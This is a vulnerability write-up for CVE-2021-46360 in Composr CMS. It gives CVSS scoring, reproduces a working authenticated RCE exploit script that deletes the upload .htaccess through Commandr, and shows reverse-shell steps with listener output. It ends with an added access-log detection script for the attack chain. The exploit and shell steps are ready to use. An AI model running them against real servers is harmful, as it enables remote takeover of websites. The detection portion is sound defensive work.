The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity (AC): Low
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required (PR): Low
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction (UI): None
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system; a locally authenticated attacker executes code to elevate privileges.
Scope (S): Unchanged
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality (C): High
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity (I): High
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability (A): High
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Authenticated Remote Code Execution in Composr-CMS Version <=10.0.39
# Exploit Title: Authenticated Remote Code Execution in Composr-CMS Version <=10.0.39
# Remote Code Execution in Composr-CMS 10.0.39 and earlier allows remote attackers to execute arbitrary code via uploading a php shell.
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 12th January,2022
# CVE ID: CVE-2021-46360
# Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS
# Reference: https://github.com/sartlabs/0days/blob/main/Composr-CMS/Exploit.py
# Vendor: https://compo.sr/download.htm
###############################################
#Step 1: We need the admin credentials. Once logged in, we can disable the PHP file-upload protection; this can also be done manually via Menu => Tools => Commandr.
#!/usr/bin/python3
import requests
from bs4 import BeautifulSoup

TARGET = 'http://192.168.56.116/composr-cms'
# The same session token is used as the keep_session parameter, the cms_session cookie value and the CSRF token.
SESSION_TOKEN = 'ef14cc258d93a' #You need to change this as it is dynamic

cookies = {
'has_cookies': '1',
'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c', #You need to change this as it is dynamic
'commandr_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D', # base64 of "/raw/uploads/filedump/": Commandr's current directory, so the rm below runs there
'last_visit': '1641783779',
'cms_session__b804794760e0b94ca2d3fac79ee580a9': SESSION_TOKEN, #You need to change this as it is dynamic
}
headers = {
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': '*/*',
'Origin': 'http://192.168.56.116',
'Referer': TARGET + '/adminzone/index.php?page=admin-commandr',
'Accept-Language': 'en-US,en;q=0.9',
}
params = {
'keep_session': SESSION_TOKEN, #You need to change this as it is dynamic
}
data = {
'_data': 'command=rm .htaccess', # Deletes the .htaccess in uploads/filedump, i.e. disables the protection so that a .php file (possibly a PHP shell) can be uploaded and executed
'csrf_token': SESSION_TOKEN, #You need to change this as it is dynamic
}
r = requests.post(TARGET + '/data/commandr.php', headers=headers, params=params, cookies=cookies, data=data)
print(r.status_code)
soup = BeautifulSoup(r.text, 'html.parser')
print(soup)
#Step 2: Now visit Content => File/Media Library and upload any .php web shell.
#Step 3: Now visit http://IP_Address/composr-cms/uploads/filedump/php-reverse-shell.php and catch the reverse shell:
[ci@parrot][~]
$nc -lvvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.116] 58984
Linux CVE-Hunting-Linux 5.11.0-44-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
13:35:13 up 20:11, 1 user, load average: 0.00, 0.01, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user :0 :0 Thu17 ?xdm? 46:51 0.04s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ pwd
/
$
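The chain above leaves two traces in the web server's access log even though the Commandr command itself travels in the POST body: a POST to data/commandr.php from the admin session, and then a request for a .php file under uploads/filedump/ that is answered with 200 rather than the 403 an intact deny rule would return. The following script is an added example, not part of the original advisory and not Composr code; it correlates those two events per client IP over combined-format log lines. The log lines are constructed for the example, the paths mirror the request URLs used in the exploit above, and the assumption that a blocked PHP request under uploads/filedump/ returns 403 is mine.

```python
"""Access-log detection for the Commandr -> uploads/filedump PHP chain.

Added example (not Composr code, not the advisory's exploit). Assumptions:
  - Apache/nginx combined log format;
  - an intact deny rule answers .php requests under uploads/filedump/ with 403,
    so a 200 there means PHP is being served (or executed) from the upload dir.
"""
import re

# Combined log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# The Commandr endpoint used in step 1 of the exploit.
COMMANDR_PATH = re.compile(r'/data/commandr\.php(?:\?|$)')
# Anything PHP-like under the file dump directory (php, php5, phtml, phar).
FILEDUMP_PHP = re.compile(r'/uploads/filedump/[^?]*\.ph(?:p\d?|tml|ar)(?:\?|$)', re.I)

# Constructed sample log; IPs and paths mirror the advisory's lab setup.
SAMPLE_LOG = """\
192.168.56.103 - - [12/Jan/2022:13:30:01 +0000] "GET /composr-cms/adminzone/index.php?page=admin-commandr HTTP/1.1" 200 8421
192.168.56.103 - - [12/Jan/2022:13:30:12 +0000] "POST /composr-cms/data/commandr.php?keep_session=ef14cc258d93a HTTP/1.1" 200 312
10.0.0.7 - - [12/Jan/2022:13:31:00 +0000] "GET /composr-cms/uploads/filedump/report.pdf HTTP/1.1" 200 52311
192.168.56.103 - - [12/Jan/2022:13:35:10 +0000] "GET /composr-cms/uploads/filedump/php-reverse-shell.php HTTP/1.1" 200 0
10.0.0.9 - - [12/Jan/2022:13:37:00 +0000] "GET /composr-cms/uploads/filedump/shell.php HTTP/1.1" 403 199
this line is not an access-log record
"""


def parse_line(line):
    """Return a dict with ip/method/path/status for a combined-format line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    return rec


def detect(lines):
    """Scan log lines in order; return (ip, path, status, severity, reason) tuples.

    A Commandr POST alone is normal admin activity and is only remembered; the
    alert fires on the PHP request under uploads/filedump/, escalated when the
    same client sent a Commandr command earlier in the log.
    """
    alerts = []
    commandr_clients = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, status = rec['ip'], rec['path'], rec['status']
        if rec['method'] == 'POST' and COMMANDR_PATH.search(path):
            commandr_clients.add(ip)
            continue
        if not FILEDUMP_PHP.search(path):
            continue
        clean_path = path.split('?', 1)[0]
        if status == 200:
            reason = 'PHP served from uploads/filedump'
            if ip in commandr_clients:
                reason += ' after a Commandr POST from the same client'
            alerts.append((ip, clean_path, status, 'critical', reason))
        else:
            alerts.append((ip, clean_path, status, 'info',
                           'PHP request to uploads/filedump denied'))
    return alerts


if __name__ == '__main__':
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

Run against the sample, the script reports one critical alert for 192.168.56.103 (the Commandr POST followed by a 200 on php-reverse-shell.php) and one informational alert for the denied shell.php request. The `rm .htaccess` text itself never reaches the access log, so catching step 1 directly needs Composr's own audit logging or a file-integrity check on uploads/filedump/.htaccess; the access-log correlation here catches the moment the deleted rule is actually abused.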